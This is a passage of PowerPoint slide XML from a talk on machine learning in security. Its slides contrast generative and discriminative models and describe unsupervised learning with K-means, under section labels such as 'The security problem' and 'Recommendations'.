              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generative:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I am trying to understand the structure in the input data given the labels I am seeing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Learning involves learning the parameters of the mathematical model but assumes a prior structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be supervised and unsupervised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most of the current generation of defensive tools use generative models</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB50BDD-23EE-423F-A11C-7496C329ABEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="4935" t="4626" r="45794" b="6429"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057372" y="2620380"/>
            <a:ext cx="2366010" cy="1920241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A3FBA8-2720-4878-BECE-BB27EB62F5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="56110" t="4626" r="4141" b="6429"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361125" y="4337575"/>
            <a:ext cx="1908810" cy="1920241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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09988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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41170" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456497" y="1501808"/>
            <a:ext cx="7719071" cy="5390746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBE2C09-4095-40AC-9845-329CC581BC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025225" y="1807355"/>
            <a:ext cx="5542222" cy="1369606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNSUPERVISED LEARNING GROUPING SIMILAR POINTS TOGETHER USING THE TWO APPROACHES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discriminative – does not rely on prior knowledge of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generative – assumes the data was generated using a known mathematical function (prior)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED69EE6-B1C7-4B59-BD57-849B68775A02}"/>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6325233" y="3511763"/>
            <a:ext cx="3281388" cy="3263505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{399568D4-47FE-4B2A-A3F0-C7DBCB12274E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="45037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12128" y="1483444"/>
            <a:ext cx="4444369" cy="5390746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6097A56A-AF50-4207-9241-64F6FC530872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4398" y="1483444"/>
            <a:ext cx="4444369" cy="5390746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25944959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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275422" y="883161"/>
            <a:ext cx="11916577" cy="5974839"/>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24" y="0"/>
            <a:ext cx="12194323" cy="1486184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025225" y="217333"/>
            <a:ext cx="6472362" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Etienne Greeff @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>etienne_greeff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat Light" charset="0"/>
              <a:ea typeface="Montserrat Light" charset="0"/>
              <a:cs typeface="Montserrat Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827755F5-F24A-4DD9-8C3A-BA5E2B4465FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625217" y="1655264"/>
            <a:ext cx="7401275" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNSUPERVISED LEARNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using K-means doesn’t assume prior knowledge about data </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2A1B01-734D-4D79-8FB6-1BA9C1E7EEB0}"/>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444831" y="2790838"/>
            <a:ext cx="7056191" cy="4013171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB526E06-AB0C-41C8-BF04-8830E27657AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:grayscl/>
          </a:blip>
          <a:srcRect t="8441" b="3948"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044724" y="1393219"/>
            <a:ext cx="4147867" cy="5451051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2607B308-206A-49F4-84FF-E41E5E23C80A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
